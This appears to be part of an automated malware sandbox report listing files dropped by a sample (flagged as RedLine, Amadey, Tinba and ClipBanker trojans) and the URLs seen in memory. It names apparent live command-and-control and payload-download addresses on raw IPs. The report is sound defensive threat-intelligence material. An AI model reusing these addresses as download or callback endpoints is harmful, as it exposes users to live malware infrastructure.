yINR7uQlPr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\10000820101\update.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\10000820101\update.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll	34%	ReversingLabs	Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\10000820101\update.exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Temp\10000830101\update.exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealz
C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	29%	ReversingLabs	Win64.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.RedLineStealz
C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe	58%	ReversingLabs	Win64.Trojan.Midie
C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	63%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\_MEI71402\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://185.81.68.147/7vhfjke3/index.php8	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.php$	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.php6	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php#	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php:	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.phpo/	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	4%	Virustotal		Browse
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.php6	11%	Virustotal		Browse
http://185.81.68.148/8Fvu5jh4DbS/index.phpoded	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.phpt	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.phpx	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.phpu	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?)	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?(	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.phpB/	0%	Avira URL Cloud	safe
http://crl.micE	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/Plugins/clip64.dllb	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.phpq0	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php_(	0%	Avira URL Cloud	safe
http://185.81.68.148/Fvu5jh4DbS/index.php	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$	0%	Avira URL Cloud	safe
http://185.81.68.147/gfx.exe	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?scr=1	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.phpodedu	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/Plugins/clip64.dll	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.php.0	0%	Avira URL Cloud	safe
https://word.office.comon	0%	Avira URL Cloud	safe
http://185.81.68.148/a	0%	Avira URL Cloud	safe
https://go.t.com/fwlink/?Li955	0%	Avira URL Cloud	safe
http://185.81.68.148/8Fvu5jh4DbS/index.php)	0%	Avira URL Cloud	safe
http://185.81.68.147/7vhfjke3/index.phpR0	0%	Avira URL Cloud	safe
http://185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.81.68.147/gfx.exe	true	Avira URL Cloud: malware	unknown
http://185.81.68.147/7vhfjke3/index.php?scr=1	true	Avira URL Cloud: malware	unknown
http://185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php#	rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.81.68.147/7vhfjke3/index.php$	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.datacontract.org	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id2Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php6	rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php8	rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.147/7vhfjke3/index.php:	rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.147/7vhfjke3/index.phpo/	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll	Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.phpoded	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.phpt	Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.phpx	Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpu	rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns	rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000000.2066603654.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3104194293.000000000C860000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	explorer.exe, 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php?)	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.81.68.147/7vhfjke3/index.php?(	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.phpB/	rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micE	CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/System.ServiceModel	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/Plugins/clip64.dllb	Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.phpq0	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q	rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php_(	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/Fvu5jh4DbS/index.php	rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$	Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g	rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/Plugins/clip64.dll	Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php.0	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15ResponseD	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://word.office.comon	explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpodedu	Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.81.68.148/a	rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.t.com/fwlink/?Li955	powershell.exe, 00000020.00000002.2604795771.00000219A8BBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php)	rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	false		high
